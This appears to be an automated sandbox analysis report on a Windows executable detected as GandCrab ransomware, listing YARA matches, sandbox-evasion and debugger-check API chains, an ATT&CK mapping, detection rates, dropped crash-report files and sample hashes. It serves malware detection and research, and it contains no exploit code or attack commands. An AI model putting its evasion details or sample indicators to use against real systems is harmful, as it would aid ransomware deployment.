                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00931E5B0_2_00931E5B
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009398E10_2_009398E1
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093A84D0_2_0093A84D
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009386740_2_00938674
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00937B900_2_00937B90
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009369EC0_2_009369EC
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009381020_2_00938102
                    Source: vy3mvlAaCZ.exeVirustotal: Detection: 85%
                    Source: vy3mvlAaCZ.exeMetadefender: Detection: 74%
                    Source: vy3mvlAaCZ.exeReversingLabs: Detection: 96%
                    Source: vy3mvlAaCZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\vy3mvlAaCZ.exe "C:\Users\user\Desktop\vy3mvlAaCZ.exe"
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4268
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F6.tmpJump to behavior
                    Source: classification engineClassification label: mal88.rans.evad.winEXE@2/4@0/0
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: vy3mvlAaCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Yara detected ReflectiveLoader
                    Source: Yara matchFile source: vy3mvlAaCZ.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vy3mvlAaCZ.exe PID: 4268, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00932A35 push ecx; ret 0_2_00932A48
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093C790 LoadLibraryA,GetProcAddress,0_2_0093C790
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00931E5B RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00931E5B
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found API chain indicative of sandbox detection
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-7900
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeAPI coverage: 0.8 %
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeAPI call chain: ExitProcess graph end nodegraph_0-5933
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00934E1A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00934E1A
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00934E1A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00934E1A
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093C790 LoadLibraryA,GetProcAddress,0_2_0093C790
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00932041 GetProcessHeap,0_2_00932041
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00933387 SetUnhandledExceptionFilter,0_2_00933387
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_009333B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009333B8
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093C090 DefWindowProcW,RegisterClassExW,_memset,CreateWindowExW,DestroyWindow,DestroyWindow,Sleep,CreateThread,Sleep,DestroyWindow,DestroyWindow,TerminateThread,CreateWindowExW,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,Sleep,DestroyWindow,DestroyWindow,TerminateThread,WaitForSingleObject,0_2_0093C090
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00932D1C cpuid 0_2_00932D1C
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_0093BA30 Sleep,Sleep,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetVersionExW,GetModuleHandleA,IsWow64Process,GetModuleHandleA,GetModuleHandleA,RegisterClassExW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateThread,Sleep,TerminateThread,Sleep,keybd_event,keybd_event,keybd_event,0_2_0093BA30
                    Source: C:\Users\user\Desktop\vy3mvlAaCZ.exeCode function: 0_2_00932881 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00932881

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Native API                    		Path Interception1
                    Process Injection                    		11
                    Virtualization/Sandbox Evasion                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Software Packing                    		LSASS Memory14
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                    Process Injection                    		Security Account Manager11
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Obfuscated Files or Information                    		NTDS13
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    vy3mvlAaCZ.exe86%VirustotalBrowse
                    vy3mvlAaCZ.exe74%MetadefenderBrowse
                    vy3mvlAaCZ.exe96%ReversingLabsWin32.Ransomware.GandCrab
                    vy3mvlAaCZ.exe100%AviraTR/Crypt.EPACK.Gen2
                    vy3mvlAaCZ.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.vy3mvlAaCZ.exe.930000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                    0.0.vy3mvlAaCZ.exe.930000.2.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                    0.0.vy3mvlAaCZ.exe.930000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                    0.0.vy3mvlAaCZ.exe.930000.4.unpack100%AviraTR/Crypt.EPACK.Gen2Download File

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    World Map of Contacted IPs

                    No contacted IP infos

                    General Information

                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:694561
                    Start date and time:2022-08-31 23:58:21 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 58s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:vy3mvlAaCZ.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal88.rans.evad.winEXE@2/4@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 100% (good quality ratio 92.2%)
                    • Quality average: 80.2%
                    • Quality standard deviation: 30.1%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 1
                    • Number of non-executed functions: 28
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Sleeps bigger than 300000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, eudb.ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vy3mvlAaCZ.exe_6074d93d852c1785169ec71e797e6a243c122_d0e789f3_1326a322\Report.wer

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.673804623399491
                    Encrypted:false
                    SSDEEP:96:kbFWtfhs1Dg3fDUpXIQcQvc6QcEDMcw3Db+HbHg/8BRTf3OyWZAXGng5FMTPSkvu:WsKHBUZMXYjuq/u7svIS274Itwl
                    MD5:3BB61DDF965463EDB0AA60D2950DC834
                    SHA1:94BB88E8277D67F9261EFDA7122B5063FAD1C3AD
                    SHA-256:7887FD561BF713404541B56AB5EF8BC9FA9A5F10F72A15C245B2559DE5EBC544
                    SHA-512:5DE44FD2771DFA8145ED27B03416A0C0CDF00C323DE366DCBEE06F5E9108F332400A2D398E82D3B131371CBA1AFE0525E599956951D7DDC63CF626FAED67A27C
                    Malicious:true
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.8.9.1.6.6.0.9.7.5.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.8.9.1.6.7.3.4.7.5.7.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.c.0.a.e.5.6.-.9.f.7.f.-.4.1.f.6.-.9.0.f.5.-.b.2.9.c.8.c.2.5.e.5.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.4.1.1.7.9.9.-.7.b.7.6.-.4.e.f.a.-.a.6.8.4.-.4.0.9.b.a.7.f.4.b.c.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.y.3.m.v.l.A.a.C.Z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.a.c.-.0.0.0.1.-.0.0.1.a.-.c.7.3.0.-.5.6.5.d.d.0.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.9.1.d.d.a.7.1.0.3.b.9.8.a.3.c.9.4.4.5.a.1.1.3.8.3.7.c.b.f.e.9.0.0.0.0.f.f.f.f.!.0.0.0.0.6.f.a.9.0.a.2.2.9.1.4.8.7.5.9.d.1.2.c.6.3.b.e.e.3.4.2.e.5.5.f.a.8.8.7.f.6.9.7.6.!.v.y.3.m.v.l.A.a.C.Z...e.x.e.....T.a.r.g.e.t.A.p.p.

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F6.tmp.dmp

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Thu Sep 1 06:59:26 2022, 0x1205a4 type
                    Category:dropped
                    Size (bytes):35404
                    Entropy (8bit):1.8846641325885034
                    Encrypted:false
                    SSDEEP:96:5P8M8M/mnPXq82qhi7o5g+f0lltRuii8Y6ATZK+TD5iWI3WIX7I2Qej:WUmnP1OGcltMGuK+TmQe
                    MD5:8041C81145A8C17D64471E698F53B7E0
                    SHA1:CB951C6F726CCC535AA77568B26EB0E4AF325116
                    SHA-256:853815B51624678FA302216392D8377C0DEA180C2C2F7590C599123E3297A7C2
                    SHA-512:16FA68013C4DE6C120CDA18E9829AAEE78EC5D01EEF97C2B51AEAD299018473E5D9D023216EFFAA9DCCEE26DB9A3F62CB6519049B1F9EA968C7CB8A40DBC4CC5
                    Malicious:false
                    Reputation:low
                    Preview:MDMP....... .......NX.c....................................................T.......8...........T...............<............................................................................................U...........B......4.......GenuineIntelW...........T...........JX.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A1A.tmp.WERInternalMetadata.xml

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8278
                    Entropy (8bit):3.696981182329922
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNiLz6e6Yq0SUZKgmfgdSPvCpr189bGMsfLCm:RrlsNi/6e6YJSUZKgmfgdSdGffP
                    MD5:0E50780F5CD7ECADA812B9172438386E
                    SHA1:CA9FAE7738916E845C90B37DA95C2B06BAB3B294
                    SHA-256:8E4496A05D4373E8EFC1358AA278C11A2639CECF86AD744F8A492B6CBBD9C630
                    SHA-512:31F04CC5C18B86C62A8A621B90CF110E510569C8717C74EEB9BC2CB9B5E99EEFFE2421E93D2A4BEFA9C7C78D21AED74738EC1D031DA07B3BC534837F4F7CA6E8
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.6.8.<./.P.i.d.>.......

                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B44.tmp.xml

                    Download File
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4563
                    Entropy (8bit):4.442876235276256
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zspJgtWI9qUWgc8sqYji8fm8M4JNWFXhho+q8FCevxEATULMd:uITf7hNgrsqYrJ0hyXevOATULMd
                    MD5:CAF0E5DE2CF8BA7461786631E7875A69
                    SHA1:02194DB299C7DF9D3E170E694DA2DCB9EDE3FB5E
                    SHA-256:333617884EFEDD0428071F30423AB1BE7EBA23F46EE7B32C922B87F79258F534
                    SHA-512:DBF3AC05100C97BDB368DC0094D24B2BE7F1EA0146ABD7B1724CCC0BC6E7FE2B16471AB916314DCCC41226BAC19DCFA1498C2412BE8A160C503A3102EA8102F3
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672810" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.497360445509992
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:vy3mvlAaCZ.exe
                    File size:159232
                    MD5:1873a210d41acdef243e921f3810803a
                    SHA1:6fa90a229148759d12c63bee342e55fa887f6976
                    SHA256:34c779bada9918972748153c3f618d6656148748478beec1ec57c7bb5e363593
                    SHA512:2a45638cc994e6e3af3fe3f7ec153235591c5e07893665485a0e564aefce1f9a8d8da9146b1d7eeab45c09f3fb4afa56107467013fe4e490800546827af96676
